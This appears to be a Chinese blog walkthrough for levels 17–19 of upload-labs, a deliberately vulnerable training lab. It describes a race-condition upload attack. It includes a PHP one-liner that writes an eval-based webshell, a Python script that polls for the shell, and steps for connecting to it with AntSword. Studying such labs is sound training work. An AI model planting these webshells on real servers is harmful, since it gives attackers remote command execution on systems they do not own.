当前位置: 首页 > news >正文

upload-labs-master通关攻略(17~19)

news 来源:原创 2025/5/9 1:20:20

Pass-17

 创建3.php

代码意思是将一句话木马写入webshell.php中

 将3.php放入

 上传时抓包发送到攻击器

清除payload位置

 设计攻击属性

 使用python写一个脚本,当ok时代表webshell.php被创建出来

//脚本,记得修改ip和文件名
import requests
url = "http://x.x.x.x/upload-labs/upload/demo.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break
    else:
        print("NO")

 攻击和脚本同时启动

 webshell.php创建后就可以用蚁剑连接

Pass-18

 将代码修改一下(Pass-16)

<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?> 

 将修改后的文件放入

 之后就和17关一模一样

 Pass-19

 创建1.php

<?php phpinfo();?>

 上传后得到

打开图显示 

相关文章:

  • RSA算法:开启现代密码学的数学之钥
  • SpringMVC中有关请求参数的问题(映射路径,传递不同的参数)
  • 前端小食堂 | Day13 - Vue.js 进阶烹饪术
  • RISC-V特权模式与寄存器
  • 计网面试准备
  • Vue的生命周期
  • Ubuntu 下 nginx-1.24.0 源码分析 - ngx_conf_param
  • FreeRTOS(7)队列集
  • Redis 主从复制详解:实现高可用与数据备份
  • 【MySQL - 表的内外连接】
  • 【13】单片机编程核心技巧:乘法运算
  • 《Python全栈开发》第2课:HTML骨架搭建 - 从零编写个人简历页面
  • 数字IC后端设计实现教程 |Innovus ICC2 Routing Pin Access Setting设置方法
  • 第十五届蓝桥杯大学B组(握手问题、小球反弹、好数)
  • ChatGPT课件分享(37页PPT)
  • 【亲测有效】Mac系统升级或降级Node.js版本,Mac系统调整node.js版本
  • 【3D视觉学习笔记1】针孔相机模型与坐标系变换
  • 【Azure 架构师学习笔记】- Azure Databricks (17) --Delta Live Table和Delta Table
  • 面试之《webpack从输入到输出经历了什么》
  • 基础网络安全-K8S 配置Ingress-controller 通过HTTPS处理服务请求
  • 上交现场配乐4K修复版《神女》:默片巅峰有了新的打开方式
  • 央行:上市公司回购增持股票自有资金比例要求从30%下调至10%
  • 五一假期,长三角铁路张家港、台州等多个车站客发量创新高
  • 虚构医药服务项目、协助冒名就医等,北京4家医疗机构被处罚
  • 人民日报头版:让青春之花绽放在祖国和人民最需要的地方
  • AI世界的年轻人|研究不止于实验室,更服务于遥远山区